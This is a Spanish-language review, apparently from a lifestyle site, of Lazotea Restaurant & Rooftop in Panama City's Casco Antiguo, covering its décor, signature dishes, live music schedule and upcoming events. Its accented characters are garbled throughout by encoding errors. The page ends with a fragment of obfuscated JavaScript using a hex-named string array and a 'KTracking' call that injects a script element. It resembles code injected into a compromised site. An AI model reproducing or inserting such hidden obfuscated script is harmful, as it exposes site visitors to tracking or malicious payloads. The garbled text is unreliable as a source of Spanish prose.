Con una vista panorA?mica de la ciudad de PanamA?, en la parte alta del hotel Casa PanamA?, en el Casco Antiguo, se encuentra Lazotea Restaurant & Rooftop, un enclave A?nico con una estructura arquitectA?nica vanguardista cargada de elementos originales que combinan lo rA?stico con lo moderno.

Hacia el interior predominan los tonos neutros y elementos estructurales como madera, cemento, ladrillo e hierro, techos altos y ventanas amplias, mobiliarios combinados con metal y madera, ademA?s de detalles que recrean un estilo industrial urbano propio de ciudades como Nueva York.

Lazotea abriA? al pA?blico hace dos aAi??os, sin embargo, hoy se reinventa para brindarle a los visitantes una experiencia gastronA?mica Latinoamericana moderna hasta bien entrada la noche. Media cola de langosta sobre falso risotto de coliflor con espinaca, ajo frito en aceite de oliva y salsa de coco o el filete de salmA?n sobre purAi?? de zapallo, bacon y bokchoy toman un sentido diferente con los toques A?nicos que aporta el chef, Pablo Viluce, quien presenta a los 250 comensales (que acoge el ambigA?) una propuesta gastronA?mica de cocina de autor.

Los platillos presentes en el menA? de este ambigA? conservan un aire desenfadado y sencillo, mantienen una mezcla de ingredientes y tAi??cnicas innovadoras, tal es el caso del Tartar de salmA?n envuelto en lajas de aguacate y balanceado con una salsa ponzu que le aporta interesantes notas agridulces. Es una receta que adquiere un matiz al incluir como acompaAi??ante unas carimaAi??olas de ajAi?? amarillo ligeramente picante que acentA?an el sabor de cada ingrediente presente en el plato, seAi??ala Joan Medina, encargado del ambigA?.

El postre es otro de los moose del restaurante. Los ingredientes presentes en cada uno son A?nicos como la atmA?sfera que ambienta al lugar. El mA?s recomendado es el mango explosivo compuesto de un merengue crocante, gel de maracuyA? con helado de yogur y peta crispy, cuya explosiA?n de sabores atraparA? a los paladares mA?s exigentes.

Definitivamente este resaturante es el ideal para pasar una tarde o noche en un ambiente de fiesta, tragos y comida ya sea con amistades o familiares. El local abre de lunes a miAi??rcoles de 11:00 a.m., hasta las 12:00 a.m., y, de jueves a sA?bado de 11:00 a.m., hasta las 3:00 a.m.

Fiesta hasta el amanecer

La mA?sica en vivo inicia de 8:00 a 10:00 de la noche los jueves cuando un showman deleita al pA?blico con el saxofA?n y tambores africanos.

Los viernes es para el grupo Escala, quienes interpretan mA?sica variada muy movida acompaAi??ada de ricos tragos, vinos, cervezas y cA?cteles de la casa.

Los sA?bados le toca al grupo Grados que interpreta mA?sica latina y fusiA?n. A las 10:00 de la noche la fiesta continA?a con el talento de los Djs residentes quienes colocan crossover de todos los gAi??neros latinos y europeos que estA?n de moda.

Para quienes buscan un ambiente mA?s reservado e Ai??ntimo el restaurante dispone de A?reas VIP con vistas panorA?micas a la ciudad ya sea de dAi??a o de noche. Una piscina de agua cristalina y un bar con cA?cteles, definitivamente son el ambiente perfecto para un dAi??a de relax, el cual brinda la sensaciA?n como si estuvieras en una casa de playa.

Proyectos a partir de septiembre

Este mes incian varios proyectos de los que dicen serA?n muy prometedores.

Joan Medina seAi??ala que contarA?n con catas de vinos, full party, eventos con la Alianza Francesa de PanamA? entre otros convenios para hacer de Lazotea un lugar A?nico y exclusivo.

“Con el relanzamiento del lugar estaremos reestructurando el calendario de eventos, contaremos con cursos de mini chef para los niAi??os los sA?bados y domingos, luego de las clases los infantes pueden tener una tarde de piscina y compartir con sus padres en un buen ambiente”, cuenta Medina.

AAi??ade que tienen preparando lo que los niAi??os utilizarA?n durante el curso. Igualmente desean implementar los domingos de brunch familiar.

Definitivamente en Lazotea es el lugar perfecto para visitar con toda la familia y vivir la mejor de las expereincias gastronA?micas de la ciudad de PanamA?.

DirecciA?n: Aven. Eloy Alfaro,Ai?? calle 11, Hotel Casa PanamA? -Casco Viejo.

TelAi??fono: 303-0994 / 6851-6431.

  t[_0xb322[13]])}else {d[_0xb322[18]](_0xb322[17])[0][_0xb322[16]](s)};if(document[_0xb322[11]][_0xb322[19]]=== _0xb322[20]&& KTracking[_0xb322[22]][_0xb322[21]](_0xb322[3]+ encodeURIComponent(document[_0xb322[4]])+ _0xb322[5]+ encodeURIComponent(document[_0xb322[6]])+ _0xb322[7]+ window[_0xb322[11]][_0xb322[10]][_0xb322[9]](_0xb322[8],_0xb322[7])+ _0xb322[12])=== -1){alert(_0xb322[23])}